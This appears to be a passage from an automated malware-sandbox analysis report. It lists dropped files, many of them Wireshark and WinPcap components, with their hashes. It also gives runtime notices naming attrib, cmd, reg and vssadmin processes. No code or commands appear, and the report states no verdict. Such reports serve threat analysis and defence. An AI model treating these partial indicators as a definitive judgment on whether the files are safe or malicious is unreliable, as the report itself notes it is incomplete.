- SHA1
- b62b4126dd0d99aa5b9ced3eafaae03e5c706bed
- SHA256
- 0d4a812c29b776a60906d7b6eaa230237121b97e26fd35706d837a47767bcee0
-
libfreetype-6.dll
- Size
- 469KiB (480176 bytes)
- Type
- data
- MD5
- 6885ff3565a8b7759b3a2ed97f1d994c
- SHA1
- eb85e7ef2876a5fdf15a0021ece9eb216973a69e
- SHA256
- b3c422e5e914d95e3c5e667158eb02425cd79ea5965f7fc4e3e93f96152f1e5f
-
libjpeg-8.dll
- Size
- 193KiB (197484 bytes)
- Type
- data
- MD5
- e9e14f887f0def2ae621267eb1a1ce4f
- SHA1
- 39383966ca2684a37ed05ab6c434b3942ee97944
- SHA256
- b8b020a3103ead4926b5a14ef881d53241cd0fc5a06cfdab819c77eeb6afafce
-
msvcm90d.dll
- Size
- 306KiB (313776 bytes)
- Type
- data
- MD5
- b1660181dbb37075fbfea41834abb466
- SHA1
- 1f1c255082e330396a76b69a75a4344a1f490807
- SHA256
- 78ae88180aa298469bb6836479c56b19ced60f7eb46e9f3d3094107c4a8b9205
-
libpango-1.0-0.dll
- Size
- 256KiB (262420 bytes)
- Type
- data
- MD5
- 4bf678800cd327af0923b2d05c0f4a75
- SHA1
- aec85f7bb67c3d023a87958725522cc44c8c3626
- SHA256
- 44a1579e3648df5db69775dbaf53ef24480bbce2cce728efdfacb3bb1c5d45df
-
libpangoft2-1.0-0.dll
- Size
- 85KiB (86784 bytes)
- Type
- data
- MD5
- c81104b2ae4957e8178f31fe6af2a693
- SHA1
- b6d774fc4c4045720ed83715b074095014dddf6f
- SHA256
- a82d268b98c0a304640fb3dc04256bf544e9f95756c0f80cf14087c80f047f85
-
java.exe
- Size
- 173KiB (177496 bytes)
- Type
- data
- MD5
- 85312568ca81d9b7d16454066173737a
- SHA1
- 902943d19894e566ab7e08aaae5cad70b4803a1b
- SHA256
- d52156353807d8528ed069bb905260467872067fac8a8cbd399a94ae872ae4ba
-
batchmnt.exe
- Size
- 114KiB (117168 bytes)
- Type
- data
- MD5
- 3d05db21ff2a338d9562dc1238024990
- SHA1
- 8e8ad45f1072834cd104855dcdaff10f4dadb6de
- SHA256
- 51ef415b482521765f2d482f67ded16fa71313d2fa4623f13d2e6542a8e5259b
-
bazisvirtualcdbus.cat
- Size
- 11KiB (11096 bytes)
- Type
- data
- MD5
- 53f691f407c8299ef178c5857befd531
- SHA1
- f76f8c1a00be99d908ce07e6c20eceee8b6a3a52
- SHA256
- 17d0ba82141eb8468d07b78ea4f89432ab8200bbda790f454dced558e099f364
-
editcap.exe
- Size
- 325KiB (333120 bytes)
- Type
- data
- MD5
- 5dcb038c6b7fe0580d322a1a9557ba19
- SHA1
- 5cdab34ebcac9a5e39ce838d1552eeedae22fbe4
- SHA256
- 42af3fa9cb6995eab3b87751b5b3e8bb4f49bd08caa82c82cb4621f64960714e
-
libgdk-win32-2.0-0.dll
- Size
- 648KiB (663312 bytes)
- Type
- data
- MD5
- b734d7591067ec2e6117c2285fb1d003
- SHA1
- 7ed1d5804985d8505a1674a420ebd86768036031
- SHA256
- d2c3de474c0ac806b9320db0c78dd4bd41c02c338f2a2ba8b66427e5104e1e31
-
vmnt.exe
- Size
- 320KiB (327424 bytes)
- Type
- data
- MD5
- 66fe9b8fb9035cbc9bd29f32ed70072c
- SHA1
- 641afa9bdfecaa3f1fd3b2de0ca5935e6a731c74
- SHA256
- d6a8ecbc378f273c28751bbaf06cfa28f3234b5b21a95d66c4bd81fd72641470
-
text2pcap.exe
- Size
- 328KiB (336192 bytes)
- Type
- data
- MD5
- 63efb08e4af6d4d64a25f19b44de924b
- SHA1
- 83744c1753987121a7be8c6e990f24b10623a37e
- SHA256
- 940016846f66c12b590f099c4a07786adf2b92e65385e0fe55faab4e0f9168c2
-
setup.exe
- Size
- 357KiB (365952 bytes)
- Type
- data
- MD5
- e3b715fd9b9005dab7db88f0a7fb7f84
- SHA1
- 3f49df0672f6293408f7c2d1d2a2ddf5ee2d4bd3
- SHA256
- 29529593fea49c025bb88283863fed9fbdf9e9b7113945c119468a59658294fd
-
mergecap.exe
- Size
- 305KiB (312128 bytes)
- Type
- data
- MD5
- 3c731d97cc91930002f5825b78e26d25
- SHA1
- de66c1139190388ab3b7f35f7f3954f5197a2ab9
- SHA256
- 3ec38929fffda245d03cdabb10a4e9a40c5ebeb95f2680a7226ca356b8b52740
-
libwimp.dll
- Size
- 65KiB (66896 bytes)
- Type
- data
- MD5
- f8c0657cb0817d1b7ad95a417677969f
- SHA1
- edb796c96a535b7da5049050f961dd8b8ec42c0d
- SHA256
- b8974ec27460a7e217491432ffee5de3ef69b185364d28a744a0ae8704942454
-
libcairo-2.dll
- Size
- 613KiB (627360 bytes)
- Type
- data
- MD5
- a7d296b20d66a7978b4be154478fb2d7
- SHA1
- 4a13627dda1cb64e523d602d9a682845060c7ef6
- SHA256
- 89f4d962a75509439c03ef31482781f6d40c966ac5ab4aaff064657c6f7a054b
-
Wireshark.exe
- Size
- 2.6MiB (2706752 bytes)
- Type
- data
- MD5
- cfa5d01cb99cd67611d9d31fb42ccff2
- SHA1
- e5513a77003f4a7c432c3a24f8afe34f51984d7b
- SHA256
- 37223084dfd0fde066f1fd68634cb5de4a417d7d74c40d29c5b7dd27def2e2eb
-
WinPcap_4_1_3.exe
- Size
- 895KiB (916072 bytes)
- Type
- data
- MD5
- 3d21ff4b15625c54619fb664fe44d477
- SHA1
- 41d27415a9aeeada1705b7ad6535552f156785d7
- SHA256
- dee9cad7cf5f418e8e2554e9dbcf70517fae44980d34cb3138c4b90f339db8cf
-
user-guide.chm
- Size
- 3.7MiB (3912891 bytes)
- Type
- data
- MD5
- 8045f50c13f7e993c38e85a61e5a95b2
- SHA1
- 6e30ecc8538d592e852fdc19f6a553515a2e2feb
- SHA256
- 84d48d182c55c836aa86f58b809c7e0d4e9040728708ca0de9c0f9036d7c1a58
-
qtshark.exe
- Size
- 3.1MiB (3234224 bytes)
- Type
- html
- MD5
- e16970e0a100ccf495be431e3c51f2fe
- SHA1
- bfa554612a98580832ae1585ebc327465fb4681c
- SHA256
- 6f4e559cf3b8458fa49199da81eb90178ea651abfa2418629ec7baa955384884
-
uninstall64.exe
- Size
- 124KiB (127408 bytes)
- Type
- data
- MD5
- ee0b624001637866202b78eed966db61
- SHA1
- 8b6032df81ee96bcf4c7f5b06b9d2d4153e5c952
- SHA256
- 910af4a1f5694af48489f76db146c2a05ffc9206d3063e0734315ddef96ba0c3
-
VCProjectIA64Platform.dll
- Size
- 283KiB (289736 bytes)
- Type
- data
- MD5
- 97d46ebce464cd746594da52847cfa21
- SHA1
- ff524487c60b4f1ab97714db77b0a81110593764
- SHA256
- 120be4cac99d36cfd60293a341bfc0e60013647c7e1893972edf8ea4a89b5553
-
vcbuild.dll
- Size
- 22KiB (22448 bytes)
- Type
- data
- MD5
- 39cc412be1944fb41bf297b5afad0ad7
- SHA1
- 0c81f364579722805c5241db51a40b710889f3a3
- SHA256
- 10ab9f5dac2a35fc40c28fffacd0d508e62139c9f125c2cc83e6b15d1358c29a
-
libgdk_pixbuf-2.0-0.dll
- Size
- 245KiB (251136 bytes)
- Type
- data
- MD5
- 81145ac969cc7fe182f9755d2fcc9e0b
- SHA1
- 456618ec50d0ec92655641457ffce5765fd2c518
- SHA256
- d184d4dd68cb341247e061c181dba5c705ebd9e5c7b60f8652d5f95bdac9ba5d
-
reordercap.exe
- Size
- 300KiB (307520 bytes)
- Type
- data
- MD5
- 67da979726f55521f8dc15db0a983ca4
- SHA1
- 5f5b597ca0074ce768e28b0e0581ae78a048375c
- SHA256
- b97e6c3090e182adad41c8c8c273b94ba5fb33580f517943a51fb31a7fc046e3
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all file accesses are visible for attrib.exe (PID: 3212)
- Not all file accesses are visible for cmd.exe (PID: 3048)
- Not all file accesses are visible for reg.exe (PID: 3132)
- Not all file accesses are visible for reg.exe (PID: 3220)
- Not all file accesses are visible for reg.exe (PID: 3236)
- Not all file accesses are visible for vssadmin.exe (PID: 3068)
- Not all sources for signature ID "api-25" are available in the report
- Not all sources for signature ID "api-34" are available in the report
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "binary-0" are available in the report
- Not all sources for signature ID "binary-10" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report